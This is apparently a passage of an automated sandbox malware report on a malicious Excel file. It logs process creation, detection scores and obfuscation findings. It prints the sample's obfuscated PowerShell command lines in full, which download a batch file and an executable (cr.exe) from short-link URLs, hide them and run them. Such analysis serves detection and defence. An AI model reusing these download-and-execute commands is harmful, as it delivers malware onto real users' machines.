      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1......................9]Q......................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .3. . ............................^Q.....t.i.m.e..........D$.............H...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........d1.......................^Q......................D$.............x...............x...............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................^Q.....r.e.g............D$...............$.....T.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q........J.............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ......................................\Q........J.............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .................................................D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J....................i^Q......$.J..............$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...2.". ............\Q.....i.f. ............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D$.............................x...............d1.......".v...............................J....Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....(................D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................|.......................................................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................|...............$....................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................]Q.....r.e.g............D$...............$.............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|...............F.......................8............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .2. . ............................]Q.....t.i.m.e..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>.....................................9]Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. .................................9]Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v....................|....................................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............). ......................................\Q........J.............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D................................D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...1.". ............\Q.....i.f. ............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.m.d...........................................(................D$.............X...............x...............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................\Q.....C.m.d............D$...............$.....j.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ..............D$......................\Q.......$..............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d............. ...............B.......................Jump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeCommand line argument: nkF24_2_00466AC0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: ul9kpUwYel.xlsVirustotal: Detection: 41%
      Source: ul9kpUwYel.xlsMetadefender: Detection: 22%
      Source: ul9kpUwYel.xlsReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: unknownProcess created: C:\Windows\System32\mode.com mode 18,1
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.batJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe' Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Obfuscated command line foundShow sources
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -ForceJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.batJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')Jump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'Jump to behavior
      Suspicious powershell command line foundShow sources
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;Jump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,24_2_00423778
      Source: sqlite3.dll.24.drStatic PE information: section name: /4
      Source: sqlite3.dll.24.drStatic PE information: section name: /19
      Source: sqlite3.dll.24.drStatic PE information: section name: /31
      Source: sqlite3.dll.24.drStatic PE information: section name: /45
      Source: sqlite3.dll.24.drStatic PE information: section name: /57
      Source: sqlite3.dll.24.drStatic PE information: section name: /70
      Source: sqlite3.dll.24.drStatic PE information: section name: /81
      Source: sqlite3.dll.24.drStatic PE information: section name: /92
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00467460 push eax; ret 24_2_0046747E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004674C1 push eax; ret 24_2_004674B6
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00467480 push eax; ret 24_2_004674B6
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FA71 push ecx; ret 24_2_0043FA84
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FC66 push ecx; ret 24_2_0043FC79
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0046FED8 pushad ; retf 0046h24_2_0046FEE1
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00222AA1 push es; retf 24_2_00222AA5
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0022502A push esi; ret 24_2_0022502E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00223605 push 00000004h; iretd 24_2_0022360C
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00223E89 push eax; retf 24_2_00223E8A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002D76B0 push eax; ret 24_2_002D76CE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002D76D0 push eax; ret 24_2_002D7706
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AFCC1 push ecx; ret 24_2_002AFCD4
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_047F350A push ss; iretd 24_2_047F3624
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_047F312B push ss; ret 24_2_047F3135
      Source: initial sampleStatic PE information: section name: UPX0
      Source: initial sampleStatic PE information: section name: UPX1

      Persistence and Installation Behavior:

      barindex
      Tries to download and execute files (via powershell)Show sources
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cr.exeJump to dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to dropped file
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043ED22 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,24_2_0043ED22
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
